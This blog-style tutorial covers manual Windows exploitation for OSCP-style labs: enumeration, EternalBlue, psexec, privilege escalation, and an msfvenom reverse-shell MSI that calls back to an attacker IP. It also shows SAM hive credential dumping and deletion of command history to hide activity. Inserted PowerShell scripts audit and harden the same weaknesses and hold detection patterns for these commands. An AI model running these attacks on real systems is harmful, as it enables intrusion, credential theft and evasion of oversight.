Manual Exploitation – Windows Edition
Not every engagement gives you the luxury of using Metasploit. Whether you’re sharpening your skills for OSCP or working around security controls, mastering manual Windows exploitation is a must.
This guide walks you through how to compromise Windows targets without Metasploit, covering enumeration, exploitation, privilege escalation, and post-exploitation — step by step.
Table of Contents
- Why Manual Windows Exploitation?
- Recon & Enumeration
- Common Exploitable Windows Services
- Gaining a Foothold
- Windows Privilege Escalation
- Post-Exploitation
- TryHackMe Rooms for Practice
- Final Thoughts
Why Manual Windows Exploitation?
- Certification requirements (OSCP, CRTP)
- Bypass detection — no framework = less noise
- Better learning — you’ll understand each moving part
- Adaptability — tailor exploits to custom scenarios
Recon & Enumeration
Nmap First
nmap -sC -sV -p- -oN win_full_scan.txt 10.10.10.10
Windows-Specific Ports to Investigate
| Port | Service | Tool Suggestions |
|---|---|---|
| 139,445 | SMB | smbclient, enum4linux, rpcclient, crackmapexec |
| 3389 | RDP | ncrack, rdesktop, xfreerdp |
| 5985 | WinRM | evil-winrm |
| 135 | RPC | rpcclient, impacket |
| 80/443 | Web | nikto, gobuster, manual crawling |
Common Exploitable Windows Services
SMB Enumeration
Null Sessions:
smbclient -L //10.10.10.10/ -N
Manual Authenticated Access:
smbclient //10.10.10.10/Users -U user
List Shares with Enum4linux:
enum4linux -a 10.10.10.10
CrackMapExec for Cred Testing:
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt
Web Servers
Treat it like Linux web apps. Look for:
- Upload forms
- Command injection
- LFI/RFI
- Outdated CMS
Use:
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
If you find an upload form:
- Try .aspx webshells
- Check for file extension filters
RDP Enumeration
If port 3389 is open:
xfreerdp /u:Administrator /p:pass /v:10.10.10.10
For brute force:
ncrack -p 3389 -U users.txt -P rockyou.txt 10.10.10.10
WinRM Exploitation
Once you get valid credentials:
evil-winrm -i 10.10.10.10 -u administrator -p 'Password123'
Note: Evil-WinRM is essential for post-exploitation. It lets you upload files, run PowerShell, and escalate privileges.
Gaining a Foothold Without Metasploit
Exploit MS17-010 (EternalBlue) Manually
Use nmap to confirm:
nmap -p445 --script smb-vuln-ms17-010 10.10.10.10
If vulnerable, try:
https://github.com/3ndG4me/AutoBlue-MS17-010
Or use:
python3 eternalblue_exploit7.py 10.10.10.10 shellcode.bin
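The SMB enumeration section and the MS17-010 section both depend on host settings the defender controls. The script below is an added example, not code from the original post: it audits, from an elevated PowerShell prompt on the Windows host, the settings that allow null-session enumeration (`smbclient -N`, `enum4linux`) and the SMBv1 dialect that EternalBlue needs, and provides a reversible hardening function. It assumes Windows 8 / Server 2012 or later for the `Get-SmbServerConfiguration` and `Set-SmbServerConfiguration` cmdlets.

```powershell
# Added example, not from the original post: audit of the host-side settings that the
# SMB enumeration and MS17-010 sections rely on. Run from an elevated PowerShell prompt.

function Get-SmbExposure {
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $srv = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $smb = Get-SmbServerConfiguration
    $findings = New-Object System.Collections.Generic.List[string]

    # RestrictAnonymous=0 or EveryoneIncludesAnonymous=1 is what lets "smbclient -L ... -N"
    # and enum4linux list shares and users without credentials.
    if ($lsa.RestrictAnonymous -eq 0 -or $lsa.EveryoneIncludesAnonymous -eq 1) {
        $findings.Add('Null-session enumeration allowed (Lsa\RestrictAnonymous=0 or EveryoneIncludesAnonymous=1)')
    }
    if ($lsa.RestrictAnonymousSAM -ne 1) {
        $findings.Add('Anonymous SAM account enumeration allowed (Lsa\RestrictAnonymousSAM is not 1)')
    }
    if ($srv.NullSessionShares) {
        $findings.Add("Shares reachable over a null session: $($srv.NullSessionShares -join ', ')")
    }
    # EternalBlue is an SMBv1 bug: with the dialect disabled there is nothing to negotiate,
    # independent of whether the MS17-010 update is installed.
    if ($smb.EnableSMB1Protocol) {
        $findings.Add('SMBv1 enabled: MS17-010 attack surface (install the update AND disable SMBv1)')
    }
    if (-not $smb.RequireSecuritySignature) {
        $findings.Add('SMB signing not required: captured authentications can be relayed')
    }

    [pscustomobject]@{
        Host     = $env:COMPUTERNAME
        Exposed  = ($findings.Count -gt 0)
        Findings = $findings.ToArray()
    }
}

# Reverts the findings above. Disabling SMBv1 breaks clients that only speak that
# dialect, so check for legacy devices before rolling this out fleet-wide.
function Set-SmbHardening {
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    Set-ItemProperty -Path $lsa -Name RestrictAnonymous         -Value 1 -Type DWord
    Set-ItemProperty -Path $lsa -Name RestrictAnonymousSAM      -Value 1 -Type DWord
    Set-ItemProperty -Path $lsa -Name EveryoneIncludesAnonymous -Value 0 -Type DWord
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -RequireSecuritySignature $true -Force
}

Get-SmbExposure | Format-List
# Apply the fixes:  Set-SmbHardening
```

Run `Get-SmbExposure` before and after the engagement's recommendations are applied; a host whose `Exposed` field is `False` should no longer answer `smbclient -L //host/ -N` with a share list, and `nmap --script smb-vuln-ms17-010` has no SMBv1 dialect to probe.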
PSExec (Manual)
With valid creds:
impacket-psexec user:password@10.10.10.10
Alternative:
smbexec.py domain/user:pass@10.10.10.10
Exploit Unquoted Service Paths (if write access)
sc qc UnquotedService
Look at BINARY_PATH_NAME in the output. If the path contains spaces and isn't wrapped in quotes, the service control manager tries each space-delimited prefix (C:\Program.exe before C:\Program Files\...) when it starts the service. If one of those directories is writable by you, a malicious .exe placed there runs instead of the real binary.
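Checking one service with `sc qc` at a time does not scale, and the same check is what a hardening review runs across a fleet. The script below is an added example, not code from the original post: it enumerates every service via WMI, keeps only unquoted paths with spaces, tests whether a low-privileged identity (assumed here to be `BUILTIN\Users`, `Authenticated Users`, `Everyone` or `INTERACTIVE`) can write to one of the ambiguous directories, and offers a remediation that quotes the path in the registry. Run it from an elevated prompt.

```powershell
# Added example, not from the original post: audit and fix for unquoted service paths.

function Test-LowPrivWritable {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    # Assumed set of "anyone can get this" identities; extend for your environment.
    $lowPriv = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone', 'NT AUTHORITY\INTERACTIVE'
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $ace.IdentityReference.Value -and
            $ace.FileSystemRights.ToString() -match 'Write|Modify|FullControl|CreateFiles') {
            return $true
        }
    }
    return $false
}

function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        # Already quoted, empty, or not an .exe launch: nothing resolves ambiguously.
        if (-not $path -or $path.StartsWith('"')) { continue }
        if ($path -notmatch '^(?<exe>.*?\.exe)(?<args>.*)$') { continue }
        $exe  = $Matches.exe
        $tail = $Matches.args
        if ($exe -notmatch ' ') { continue }

        # For C:\Program Files\My App\svc.exe the service controller tries
        # C:\Program.exe, then C:\Program Files\My.exe, before the real binary.
        $parts    = $exe.Split(' ')
        $writable = @()
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Path $candidate -Parent
            if ($dir -and (Test-LowPrivWritable -Directory $dir)) { $writable += $candidate }
        }

        [pscustomobject]@{
            Service       = $svc.Name
            RunsAs        = $svc.StartName
            PathName      = $path
            WritableSpots = $writable            # non-empty means the hole is actually reachable
            QuotedPath    = '"' + $exe + '"' + $tail
        }
    }
}

# Fix: rewrite ImagePath (the registry value behind "sc config ... binPath=") with quotes.
function Repair-UnquotedServicePath {
    param([Parameter(ValueFromPipeline)] $Finding)
    process {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($Finding.Service)"
        Set-ItemProperty -Path $key -Name ImagePath -Value $Finding.QuotedPath
    }
}

Get-UnquotedServicePath | Format-Table Service, RunsAs, WritableSpots, PathName -AutoSize
# Remediate everything found:  Get-UnquotedServicePath | Repair-UnquotedServicePath
```

An unquoted path alone is a finding of low severity; it becomes a privilege-escalation issue only when `WritableSpots` is non-empty and `RunsAs` is a privileged account such as `LocalSystem`, which is why the audit reports both columns.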
Windows Privilege Escalation
Once you have a low-priv shell, escalate.
Basic Manual Checks
whoami
hostname
systeminfo
net users
net localgroup administrators
UAC Misconfigurations
whoami /groups
Look at the Mandatory Label line: "Medium Mandatory Level" together with BUILTIN\Administrators marked "Group used for deny only" means UAC has filtered your token; "High Mandatory Level" means you are already elevated.
If you're in the local Administrators group but running with the filtered token, request elevation (this raises a UAC consent prompt, so it only succeeds from an interactive session or when the prompt policy is set to elevate silently):
cmd /c "powershell Start-Process cmd -Verb runAs"
SUID-like Escalation (AlwaysInstallElevated)
Check if this registry setting is vulnerable:
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If both are 1, you can create a malicious .msi file:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f msi > shell.msi
Transfer & execute with msiexec:
msiexec /quiet /qn /i C:\Users\user\Downloads\shell.msi
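The UAC and AlwaysInstallElevated checks above are registry reads that a defender can run in the same form as an audit. The script below is an added example, not code from the original post: it reports whether the current token is filtered, flags the UAC policy values that make elevation silent or unfiltered, evaluates the two AlwaysInstallElevated values exactly as the text describes (both must be 1), and resets the installer policy. Reading HKLM needs no elevation; `Repair-AlwaysInstallElevated` does. The function names are the example's own.

```powershell
# Added example, not from the original post: privilege-escalation misconfiguration audit.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Absent key or value is reported as $null instead of an error.
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Test-IsElevated {
    # True only for a full (high-integrity) admin token, i.e. what "whoami /groups" shows
    # as "Mandatory Label\High Mandatory Level". A UAC-filtered admin token returns False.
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    ([Security.Principal.WindowsPrincipal]$id).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Test-UacConfig {
    $k = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $findings = @()
    if ((Get-RegValue $k 'EnableLUA') -ne 1) {
        $findings += 'EnableLUA=0: UAC is off, every admin logon gets a full token'
    }
    if ((Get-RegValue $k 'ConsentPromptBehaviorAdmin') -eq 0) {
        $findings += 'ConsentPromptBehaviorAdmin=0: elevation (Start-Process -Verb runAs) needs no prompt'
    }
    if ((Get-RegValue $k 'LocalAccountTokenFilterPolicy') -eq 1) {
        $findings += 'LocalAccountTokenFilterPolicy=1: local admins get unfiltered tokens over the network (psexec/WinRM)'
    }
    [pscustomobject]@{
        User     = "$env:USERDOMAIN\$env:USERNAME"
        Elevated = Test-IsElevated
        Findings = $findings
    }
}

function Test-AlwaysInstallElevated {
    $hkcu = Get-RegValue 'HKCU:\Software\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    $hklm = Get-RegValue 'HKLM:\Software\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    # Only the combination matters: with both set to 1, msiexec installs any package as SYSTEM.
    [pscustomobject]@{
        HKCU       = $hkcu
        HKLM       = $hklm
        Vulnerable = ($hkcu -eq 1 -and $hklm -eq 1)
    }
}

function Repair-AlwaysInstallElevated {
    foreach ($hive in 'HKCU', 'HKLM') {
        $p = "${hive}:\Software\Policies\Microsoft\Windows\Installer"
        if (Test-Path $p) { Set-ItemProperty -Path $p -Name AlwaysInstallElevated -Value 0 -Type DWord }
    }
}

Test-UacConfig | Format-List
Test-AlwaysInstallElevated | Format-List
```

If the policy is delivered by Group Policy, the registry fix is overwritten at the next refresh; the durable remediation is to disable "Always install with elevated privileges" in both the Computer and User Configuration halves of the GPO.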
Tools to Upload for Enumeration
Use evil-winrm's built-in upload command, for example:
upload winPEASx64.exe
./winPEASx64.exe
Post-Exploitation
Credential Dumping (Manual)
From an elevated shell, save the SAM and SYSTEM hives:
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
Download both files and extract the hashes offline (cracking them is a separate step) with:
secretsdump.py -sam sam -system system LOCAL
Password Hunting
Check:
type C:\Users\Administrator\Desktop\notes.txt
dir C:\inetpub\wwwroot\
And of course:
Get-ChildItem -Recurse | Select-String -Pattern "password"
Lateral Movement
If you have creds for other systems:
crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123'
Cleanup
Remove uploaded files:
del C:\Users\Public\winPEASx64.exe
Clear command history:
Remove-Item (Get-PSReadlineOption).HistorySavePath
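Both the hive saves in the Credential Dumping section and the history deletion in the Cleanup section run as ordinary processes, so the command line is what a defender keys on. The script below is an added example, not code from the original post: it defines two detection rules, runs them over a constructed set of sample command lines so the logic can be exercised offline, and includes a function that applies the same rules to live Security event 4688 records. It assumes process-creation auditing with command-line logging is enabled (Audit Process Creation plus the "Include command line in process creation events" policy); the rule names and sample lines are the example's own.

```powershell
# Added example, not from the original post: detection of "reg save" hive dumps and
# PSReadLine history deletion in process-creation telemetry.

$DetectionRules = [ordered]@{
    'Registry hive save (credential dumping)'      = '(?i)\breg(\.exe)?\s+save\s+(hklm\\)?(sam|system|security)\b'
    'PSReadLine history deletion (anti-forensics)' = '(?i)(Remove-Item|del|rm)\b.*(HistorySavePath|ConsoleHost_history\.txt)'
}

function Test-SuspiciousCommandLine {
    param([string]$CommandLine)
    # Returns the name of the first rule that fires, or $null when the line is benign.
    foreach ($rule in $DetectionRules.GetEnumerator()) {
        if ($CommandLine -match $rule.Value) { return $rule.Key }
    }
    return $null
}

function Find-SuspiciousProcessCreation {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Pull fields by name from the event XML rather than by position.
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) {
                if ($d.Name) { $data[$d.Name] = $d.'#text' }
            }
            $hit = Test-SuspiciousCommandLine -CommandLine $data['CommandLine']
            if ($hit) {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    User        = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                    Rule        = $hit
                    CommandLine = $data['CommandLine']
                }
            }
        }
}

# Constructed sample command lines (not real log data) to exercise the rules offline.
$SampleCommandLines = @(
    'reg  save HKLM\SAM C:\Users\Public\sam',
    'C:\Windows\system32\reg.exe save hklm\system system',
    'powershell.exe -c "Remove-Item (Get-PSReadlineOption).HistorySavePath"',
    'reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated',
    'notepad.exe C:\Users\user\notes.txt'
)
foreach ($cl in $SampleCommandLines) {
    $rule  = Test-SuspiciousCommandLine -CommandLine $cl
    $label = if ($rule) { $rule } else { 'benign' }
    '{0,-45} {1}' -f $label, $cl
}
# On a live host:  Find-SuspiciousProcessCreation | Format-Table -AutoSize
```

The first two samples fire the hive-save rule, the third fires the history-deletion rule, and the `reg query` and `notepad.exe` lines stay benign; the `\b` anchors keep the rule from matching `reg.exe` paths that merely contain the word "save" elsewhere in the argument list.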
TryHackMe Rooms for Practice
Final Thoughts
Manual Windows exploitation requires patience, creativity, and knowledge of how the OS is stitched together. While tools like Metasploit and Cobalt Strike are flashy, the best pentesters understand what’s happening under the hood.
Learn it raw, do it right, and when tools fail — you won’t.
